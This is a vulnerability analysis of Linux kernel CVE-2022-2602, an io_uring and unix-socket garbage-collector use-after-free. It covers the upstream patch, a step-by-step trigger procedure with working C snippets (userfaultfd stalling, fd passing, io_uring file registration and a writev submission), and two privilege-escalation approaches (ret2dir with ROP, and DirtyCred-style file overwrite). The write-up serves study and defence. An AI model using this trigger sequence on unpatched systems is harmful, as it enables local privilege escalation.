Kernel Vulnerability Analysis: CVE-2022-2602
Vulnerability Overview
A new Linux kernel vulnerability, CVE-2022-2602, was recently disclosed. It is a use-after-free involving two subsystems: io_uring and the unix-socket garbage collector.
It affects upstream stable 5.4.y, 5.15.y, and later versions.
On the latest Ubuntu kernels, the vulnerability has already been fixed.
Patch
Instead of putting io_uring’s registered files in unix_gc() we want it to be done by io_uring itself. The trick here is to consider io_uring registered files for cycle detection but not actually putting them down.
Because io_uring can’t register other ring instances, this will remove all refs to the ring file triggering the ->release path and clean up with io_ring_ctx_free().
Cc: stable@vger.kernel.org
Fixes: 6b06314c47e1 (“io_uring: add file set registration”)
Reported-and-tested-by: David Bouman <dbouman03@gmail.com>
Signed-off-by: Pavel Begunkov <asml.silence@gmail.com>
Signed-off-by: Thadeu Lima de Souza Cascardo <cascardo@canonical.com>
[axboe: add kerneldoc comment to skb, fold in skb leak fix]
Signed-off-by: Jens Axboe <axboe@kernel.dk>
 include/linux/skbuff.h |  2 ++
 io_uring/rsrc.c        |  1 +
 net/unix/garbage.c     | 20 ++++++++++++++++++++
 3 files changed, 23 insertions(+), 0 deletions(-)
diff --git a/include/linux/skbuff.h b/include/linux/skbuff.h
index 9fcf534f2d927..7be5bb4c94b6d 100644
--- a/include/linux/skbuff.h
+++ b/include/linux/skbuff.h
@@ -803,6 +803,7 @@ typedef unsigned char *sk_buff_data_t;
* @csum_level: indicates the number of consecutive checksums found in
* the packet minus one that have been verified as
* CHECKSUM_UNNECESSARY (max 3)
+ * @scm_io_uring: SKB holds io_uring registered files
* @dst_pending_confirm: need to confirm neighbour
* @decrypted: Decrypted SKB
* @slow_gro: state present at GRO time, slower prepare step required
@@ -982,6 +983,7 @@ struct sk_buff {
#endif
__u8 slow_gro:1;
__u8 csum_not_inet:1;
+ __u8 scm_io_uring:1;
#ifdef CONFIG_NET_SCHED
__u16 tc_index; /* traffic control index */
diff --git a/io_uring/rsrc.c b/io_uring/rsrc.c
index 6f88ded0e7e56..012fdb04ec238 100644
--- a/io_uring/rsrc.c
+++ b/io_uring/rsrc.c
@@ -855,6 +855,7 @@ int __io_scm_file_account(struct io_ring_ctx *ctx, struct file *file)
UNIXCB(skb).fp = fpl;
skb->sk = sk;
+ skb->scm_io_uring = 1;
skb->destructor = unix_destruct_scm;
refcount_add(skb->truesize, &sk->sk_wmem_alloc);
}
diff --git a/net/unix/garbage.c b/net/unix/garbage.c
index d45d5366115a7..dc27635403932 100644
--- a/net/unix/garbage.c
+++ b/net/unix/garbage.c
@@ -204,6 +204,7 @@ void wait_for_unix_gc(void)
/* The external entry point: unix_gc() */
void unix_gc(void)
{
+ struct sk_buff *next_skb, *skb;
struct unix_sock *u;
struct unix_sock *next;
struct sk_buff_head hitlist;
@@ -297,11 +298,30 @@ void unix_gc(void)
spin_unlock(&unix_gc_lock);
+ /* We need io_uring to clean its registered files, ignore all io_uring
+ * originated skbs. It's fine as io_uring doesn't keep references to
+ * other io_uring instances and so killing all other files in the cycle
+ * will put all io_uring references forcing it to go through normal
+ * release path eventually putting registered files.
+ */
+ skb_queue_walk_safe(&hitlist, skb, next_skb) {
+ if (skb->scm_io_uring) {
+ __skb_unlink(skb, &hitlist);
+ skb_queue_tail(&skb->sk->sk_receive_queue, skb);
+ }
+ }
+
/* Here we are. Hitlist is filled. Die. */
__skb_queue_purge(&hitlist);
spin_lock(&unix_gc_lock);
+ /* There could be io_uring registered files, just push them back to
+ * the inflight list
+ */
+ list_for_each_entry_safe(u, next, &gc_candidates, link)
+ list_move_tail(&u->link, &gc_inflight_list);
+
/* All candidates should have been detached by now. */
BUG_ON(!list_empty(&gc_candidates));
As the patch description notes, cleaning up files registered with io_uring should be done by io_uring itself; unix GC, however, ignored this special case, and by calling __skb_queue_purge(&hitlist) it ultimately freed the io_uring-registered files through fput() prematurely, causing the use-after-free. The patch adds a filter in unix GC for skbs carrying io_uring-registered files and puts those skbs back onto their receive queues.
Analysis of the Trigger Process
The patch analysis above explains the root cause, but actually triggering the vulnerability still requires some careful construction.
The following walks through the trigger process; performing these steps reproduces the bug.
1
Use userfaultfd or a FUSE filesystem to create a memory region, bogus, in user space. The first access to this memory triggers a page fault, and the fault handler is installed and runs in user space. A minimal sketch follows.
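Below is a minimal userfaultfd sketch (an illustrative assumption, not the original PoC; setup_bogus() and fault_handler() are hypothetical helpers). The handler thread deliberately blocks after the fault arrives, which creates the delay window the trigger needs:
#include <fcntl.h>
#include <linux/userfaultfd.h>
#include <pthread.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <unistd.h>

static void *fault_handler(void *arg)
{
    int uffd = (int)(long)arg;
    struct uffd_msg msg;

    // Blocks until the kernel first touches the registered page.
    read(uffd, &msg, sizeof(msg));

    // Delay window: let unix_gc() free the file (steps 9-10), then
    // resolve the fault with UFFDIO_COPY so io_sq_thread resumes.
    return NULL;
}

static void *setup_bogus(size_t len) // len must be page-aligned
{
    int uffd = syscall(SYS_userfaultfd, O_CLOEXEC);
    struct uffdio_api api = { .api = UFFD_API };
    void *bogus = mmap(NULL, len, PROT_READ | PROT_WRITE,
                       MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    struct uffdio_register reg = {
        .range = { .start = (unsigned long)bogus, .len = len },
        .mode  = UFFDIO_REGISTER_MODE_MISSING,
    };
    pthread_t t;

    ioctl(uffd, UFFDIO_API, &api);
    ioctl(uffd, UFFDIO_REGISTER, &reg);
    pthread_create(&t, NULL, fault_handler, (void *)(long)uffd);
    return bogus;
}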
2
socketpair(AF_UNIX, SOCK_DGRAM, 0, s);
socketpair() creates two AF_UNIX sockets. For each socket, the kernel creates a struct sock and a struct file (call the two struct socks socka and sockb, and the two struct files file1 and file2), and unix_socketpair() points each struct sock's peer at the other (ska and skb below are the kernel's local variable names):
unix_peer(ska) = skb;
unix_peer(skb) = ska;
3
Create an io_uring instance.
params->flags = IORING_SETUP_SQPOLL;
fd = io_uring_setup(32, params);
In the kernel, io_uring_get_file() creates a unix socket and assigns it to ctx->ring_sock, then creates a struct file for the ring:
static struct file *io_uring_get_file(struct io_ring_ctx *ctx)
{
...
ret = sock_create_kern(&init_net, PF_UNIX, SOCK_RAW, IPPROTO_IP,
&ctx->ring_sock);
...
file = anon_inode_getfile("[io_uring]", &io_uring_fops, ctx,
O_RDWR | O_CLOEXEC);
...
ctx->ring_sock->file = file;
...
return file;
}
4
Create a file named "null" in the current directory; the kernel creates a struct file for it (call it file3). Then register file2 and file3 with io_uring_register():
rfd[0] = s[1];
rfd[1] = open("null", O_RDWR | O_CREAT | O_TRUNC, 0644);
io_uring_register(fd, IORING_REGISTER_FILES, rfd, 2);
During registration, the kernel does the following:
- It increments file->f_count of file2 and file3; both become 2.
- struct unix_sock has an inflight member. sockb is a unix_sock, and while handling file2 the registration path calls unix_inflight(), which increments sockb->inflight to 1 and adds sockb to gc_inflight_list:
struct unix_sock {
    struct sock sk;
    struct unix_address *addr;
    struct path path;
    struct mutex iolock, bindlock;
    struct sock *peer;
    struct list_head link;
    atomic_long_t inflight;
    ...
};
void unix_inflight(struct user_struct *user, struct file *fp)
{
struct sock *s = unix_get_socket(fp);
spin_lock(&unix_gc_lock);
if (s) {
struct unix_sock *u = unix_sk(s);
if (atomic_long_inc_return(&u->inflight) == 1) { // increment u->inflight
BUG_ON(!list_empty(&u->link));
list_add_tail(&u->link, &gc_inflight_list); // add u to gc_inflight_list
} else {
BUG_ON(list_empty(&u->link));
}
/* Paired with READ_ONCE() in wait_for_unix_gc() */
WRITE_ONCE(unix_tot_inflight, unix_tot_inflight + 1);
}
user->unix_inflight++;
spin_unlock(&unix_gc_lock);
}
- Finally, a struct sk_buff is allocated; its fp member holds the struct file pointers of file2 and file3, and the skb is queued on the sk_receive_queue of io_uring's sk (ctx->ring_sock->sk):
static int __io_sqe_files_scm(struct io_ring_ctx *ctx, int nr, int offset)
{
...
skb = alloc_skb(0, GFP_KERNEL); // allocate the skb
...
if (nr_files) {
fpl->max = SCM_MAX_FD;
fpl->count = nr_files;
UNIXCB(skb).fp = fpl;
skb->destructor = unix_destruct_scm;
refcount_add(skb->truesize, &sk->sk_wmem_alloc);
skb_queue_head(&sk->sk_receive_queue, skb); // queue the skb on sk->sk_receive_queue
...
}
return 0;
}
5
close(rfd[1]);
At this point the refcount of file3's struct file is 2; after the decrement, file->f_count is 1, and since the refcount is nonzero the struct file is not freed.
6
sendfd(s[0], fd);
Socket socka sends a msg whose data carries the fd of the io_uring created in step 3 (a minimal sketch of the sendfd() helper appears at the end of this step).
In the kernel, this triggers operations much like those of io_uring_register:
- The refcount of the io_uring file is incremented;
int unix_attach_fds(struct scm_cookie *scm, struct sk_buff *skb)
{
...
for (i = scm->fp->count - 1; i >= 0; i--)
unix_inflight(scm->fp->user, scm->fp->fp[i]); // mark each passed fd in-flight
return 0;
}
- io_uring's sock (ctx->ring_sock->sk) is also a unix_sock; unix_inflight() raises its inflight value to 1 and adds it to gc_inflight_list;
static int unix_dgram_sendmsg(struct socket *sock, struct msghdr *msg,
size_t len)
{
...
other = unix_peer_get(sk);
...
skb = sock_alloc_send_pskb(sk, len - data_len, data_len,
msg->msg_flags & MSG_DONTWAIT, &err,
PAGE_ALLOC_COSTLY_ORDER);
...
skb_queue_tail(&other->sk_receive_queue, skb); // queue the skb on sockb's sk_receive_queue
...
}
- Finally, a struct sk_buff is created and queued on the sk_receive_queue of socka->peer (i.e., sockb).
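The sendfd() used above is the author's helper; a minimal sketch of an equivalent (an assumption about its implementation) passes the fd over the AF_UNIX socket as an SCM_RIGHTS control message, which is what reaches unix_attach_fds() in the kernel:
#include <string.h>
#include <sys/socket.h>
#include <sys/uio.h>

static void sendfd(int sock, int fd)
{
    char dummy = 'x';
    struct iovec iov = { .iov_base = &dummy, .iov_len = 1 };
    union { struct cmsghdr hdr; char buf[CMSG_SPACE(sizeof(int))]; } u;
    struct msghdr msg = {
        .msg_iov = &iov, .msg_iovlen = 1,
        .msg_control = u.buf, .msg_controllen = sizeof(u.buf),
    };
    struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);

    cmsg->cmsg_level = SOL_SOCKET;
    cmsg->cmsg_type = SCM_RIGHTS; // fd passing, handled by unix_attach_fds()
    cmsg->cmsg_len = CMSG_LEN(sizeof(int));
    memcpy(CMSG_DATA(cmsg), &fd, sizeof(int));
    sendmsg(sock, &msg, 0);
}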
7
close(s[0]);
close(s[1]);
Since file1's refcount is 1 at this point, its struct file is freed;
file2's refcount is 2, so after the decrement it is 1 and the corresponding struct file is not freed.
8
Call io_uring_submit() to submit a request configured as follows:
sqe->opcode = IORING_OP_WRITEV;
sqe->fd = 1;
sqe->addr = (long)bogus;
sqe->len = 1;
sqe->flags = IOSQE_FIXED_FILE;
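For reference, the same submission expressed with liburing (an illustrative assumption, not the original PoC; submit_stuck_writev() is a hypothetical helper). The iovec array is placed at bogus, the userfaultfd-backed region from step 1, so io_sq_thread faults inside io_import_iovec() while copying it in:
#include <liburing.h>

static void submit_stuck_writev(struct io_uring *ring, void *bogus)
{
    struct io_uring_sqe *sqe = io_uring_get_sqe(ring);

    // fd 1 is file3's slot in the file table registered in step 4.
    io_uring_prep_writev(sqe, 1, (struct iovec *)bogus, 1, 0);
    sqe->flags |= IOSQE_FIXED_FILE; // resolve fd via the registered files
    io_uring_submit(ring);          // wakes the SQPOLL thread io_sq_thread
}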
In the io_uring_enter() system call, the kernel thread io_sq_thread is woken up to handle the request:
SYSCALL_DEFINE6(io_uring_enter, unsigned int, fd, u32, to_submit,
                u32, min_complete, u32, flags, const void __user *, argp,
                size_t, argsz)
{
...
if (ctx->flags & IORING_SETUP_SQPOLL) {
io_cqring_overflow_flush(ctx);
if (unlikely(ctx->sq_data->thread == NULL)) {
ret = -EOWNERDEAD;
goto out;
}
if (flags & IORING_ENTER_SQ_WAKEUP)
wake_up(&ctx->sq_data->wait); // wake the kernel thread io_sq_thread
...
}
...
}
The request's user-space address is the previously prepared bogus region; when the kernel accesses it, a page fault is raised and control returns to the handler set up in user space. That handler deliberately stalls, waiting for the free to complete.
static int io_write(struct io_kiocb *req, unsigned int issue_flags)
{
...
if (rw) {
...
} else {
ret = io_import_iovec(WRITE, req, &iovec, iter, !force_nonblock); // page fault here; blocks waiting for the user-space handler
...
}
}
9
io_uring_queue_exit(&ring);
Tear down the io_uring. Because the ring file's refcount does not drop to zero (the in-flight reference from step 6 still holds it), the struct file is not freed.
10
close(socket(AF_UNIX, SOCK_DGRAM, 0));
A close() on an AF_UNIX socket causes the kernel to invoke unix_gc():
static void unix_release_sock(struct sock *sk, int embrion)
{
...
if (unix_tot_inflight)
unix_gc();
}
void unix_gc(void)
{
    ...
    list_for_each_entry_safe(u, next, &gc_inflight_list, link) {
        long total_refs;
        long inflight_refs;

        total_refs = file_count(u->sk.sk_socket->file);
        inflight_refs = atomic_long_read(&u->inflight);

        BUG_ON(inflight_refs < 1);
        BUG_ON(total_refs < inflight_refs);
        if (total_refs == inflight_refs) { // file refcount equals the inflight count
            list_move_tail(&u->link, &gc_candidates); // move to gc_candidates
            __set_bit(UNIX_GC_CANDIDATE, &u->gc_flags);
            __set_bit(UNIX_GC_MAYBE_CYCLE, &u->gc_flags);
        }
    }

    list_for_each_entry(u, &gc_candidates, link)
        scan_children(&u->sk, dec_inflight, NULL);

    list_add(&cursor, &gc_candidates);
    while (cursor.next != &gc_candidates) {
        u = list_entry(cursor.next, struct unix_sock, link);
        list_move(&cursor, &u->link);

        if (atomic_long_read(&u->inflight) > 0) {
            list_move_tail(&u->link, &not_cycle_list); // unix_socks whose inflight is still positive move to not_cycle_list
            __clear_bit(UNIX_GC_MAYBE_CYCLE, &u->gc_flags);
            scan_children(&u->sk, inc_inflight_move_tail, NULL);
        }
    }
    list_del(&cursor);

    skb_queue_head_init(&hitlist);
    list_for_each_entry(u, &gc_candidates, link)
        scan_children(&u->sk, inc_inflight, &hitlist); // move all skbs on the sk_receive_queue of each gc_candidates unix_sock to hitlist

    while (!list_empty(&not_cycle_list)) {
        u = list_entry(not_cycle_list.next, struct unix_sock, link);
        __clear_bit(UNIX_GC_CANDIDATE, &u->gc_flags);
        list_move_tail(&u->link, &gc_inflight_list);
    }

    spin_unlock(&unix_gc_lock);

    __skb_queue_purge(&hitlist); // purge the skbs on hitlist
    ...
}
- unix_gc() first walks gc_inflight_list looking for unix_socks whose file refcount equals their inflight count, and moves them to the gc_candidates list. file2's refcount and inflight count are both 1, so the corresponding sockb is placed into gc_candidates.
- Next, unix_socks in gc_candidates whose inflight count is still greater than zero are moved to the not_cycle_list;
- The skbs on the sk_receive_queue of every unix_sock remaining in gc_candidates are moved to the hitlist;
- __skb_queue_purge(&hitlist) then destroys the skbs on the hitlist, including the skb from step 4 that references file2 and file3. Ultimately, __scm_destroy() calls fput(), freeing their struct file structures:
void __scm_destroy(struct scm_cookie *scm)
{
    struct scm_fp_list *fpl = scm->fp;
    int i;

    if (fpl) {
        scm->fp = NULL;
        for (i = fpl->count - 1; i >= 0; i--)
            fput(fpl->fp[i]); // drops the last reference, freeing the struct file
        free_uid(fpl->user);
        kfree(fpl);
    }
}
11
The user-space handler for the bogus page fault now resumes; execution returns to the kernel, and io_sq_thread continues the writev on file3, whose struct file has already been freed. This is the use-after-free.
Exploitation Ideas
In this context, several useful primitives are available:
if (req->file->f_op->write_iter)
    ret2 = call_write_iter(req->file, kiocb, iter);
else if (req->file->f_op->write)
    ret2 = loop_rw_iter(WRITE, req, iter);
static inline ssize_t call_write_iter(struct file *file, struct kiocb *kio, struct iov_iter *iter)
{
return file->f_op->write_iter(kio, iter);
}
static ssize_t loop_rw_iter(int rw, struct io_kiocb *req, struct iov_iter *iter)
{
    struct kiocb *kiocb = &req->rw.kiocb;
    struct file *file = req->file;
    ...
    if (rw == READ)
        nr = file->f_op->read(file, iovec.iov_base, iovec.iov_len,
                              io_kiocb_ppos(kiocb));
    else
        nr = file->f_op->write(file, iovec.iov_base, iovec.iov_len,
                               io_kiocb_ppos(kiocb));
    ...
}
These include both a code-execution primitive and a file-write primitive.
- Idea 1: use ret2dir for heap feng shui, then hijack control flow via the file->f_op->write call primitive; with the attacker-controlled file structure as the first argument, the exploit can be completed through ROP.
- Idea 2: borrow the DirtyCred approach and find a suitable privileged file to overwrite, achieving privilege escalation. The target must either support IOCB_DIRECT or be a non-regular file.
Summary
unix_gc() lacked filtering for skbs originating from io_uring and mistakenly freed the struct file structures of files registered with io_uring, ultimately causing the use-after-free. By constructing a reference cycle between AF_UNIX sockets and the io_uring socket, and using the delay introduced by userfaultfd or FUSE, the vulnerability can be triggered reliably. Finally, combining the surrounding code, two possible exploitation approaches were analyzed.